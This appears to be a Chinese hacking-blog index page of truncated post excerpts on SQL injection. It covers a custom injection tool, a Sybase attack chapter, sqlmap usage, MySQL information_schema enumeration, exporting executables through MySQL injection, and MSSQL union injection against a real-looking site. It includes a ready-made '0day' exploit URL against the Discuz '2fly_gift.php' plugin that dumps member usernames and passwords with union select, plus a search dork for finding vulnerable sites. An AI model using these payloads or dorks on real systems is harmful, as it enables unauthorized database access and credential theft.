From:101d1

经常碰到这样的注入环境,但有的时候网上给的工具并不能完全应付所有的环境。比如有的会有过滤啊啥的,为了方便我特意写了这个工具。基本上可以应付所有的 php+mysql5的注入环境,因为自己可以直接修改注入语句,所以只要手工能绕过的过滤,该工具都可以。而且我添加了最新使用 group_concat获取数据的方式,可以大大降低注入时提交的语句量和获取数据的时间。先看看界面吧:

tt1

阅读全文

西关注:原文来自数据库黑客大曝光—— 数据库服务器防护术,真正要研究数据库安全的可以买一本看看,支持正版。本文来自第十四章。

Sybase的攻击和防御是一个广泛的主题,因此本章试图提取问题的本质,并演示一些有趣的攻击和场景。在防御方面,如果可能的话,可以采取很多措施以增加攻击的难度。本章涉及了很多防御问题。

但是首先需要定位Sybase服务器并确定其配置。

14.1  发现目标

攻击Sybase服务器的第一步是在网络中定位服务器。本节描述了多种定位Sybase服务器的方法。

14.1.1  扫描Sybase

正如前面已经注意到的,Sybase通常监听一 些众所周知的TCP端口—— 5000-5004、8181和8182。配置Sybase监听不同的端口是很容易的,但是这些众所周知的端口真的帮了大忙。使用端口扫描工具,例如 Fyodor的nMap(http://www.insecure.org/nmap),是通过特定已知的开放端口定位主机的最好的方式。

阅读全文

SQLMAP 注射工具用法

From:乱七八糟

1 。 介绍
1.1 要求
1.2 网应用情节
1.3 SQL 射入技术
1.4 特点
1.5 下载和更新sqlmap
1.6 执照

2 。 用法
2.1 帮助
2.2 目标URL

阅读全文

来源: 普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php

阅读全文

mysql5注入笔记

From:谈笑书生

mysql新增加一个库叫information_schema,可以爆库爆表爆字段。
首先介绍一下的是爆库
select SCHEMA_NAME from information_schema.SCHEMATA limit 5,1/* 5,1表示从第1个开始,数到第5个
然后就是爆表了。
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6D656D626572 limit 5,1/*TABLE_SCHEMA=后面是库名的16进制

阅读全文

作者:sai52[B.H.S.T]

前言

之前在《mysql下读取文件的几种方式及应用》一文中提到在mysql注入中理论上应该可以导出可执行二进制文件到启动项的说法,现给出原理及实例供大家参考。

MYSQL注入中导出文件需满足的条件大家都知道,就不多说了,要导出可执行二进制文件还需注入点必须存在二进制编码格式数据类型的字段(如BLOB或LONGBLOB数据类型)。要导出可执行bat文件对字段的数据类型没有要求。其他一些附加限制条件依环境而定。

阅读全文

php+Mssql 2005注射

来自:谈笑书生

注:个人建议用1,2,3,4之类的数字代替null,通过页面上显示的数字来进行判断列名的位置。

用union查询手注的时候的确方便不少,不过我给的语句很蹩脚,临时凑出来的,效率也不太高,勉强能用而已。仅作参考。。

注射点:http://xxx.in.th/news_show.php?newsid=400

要用union查询的话,先确定有几个字段,使用order by 来完成,就是:

阅读全文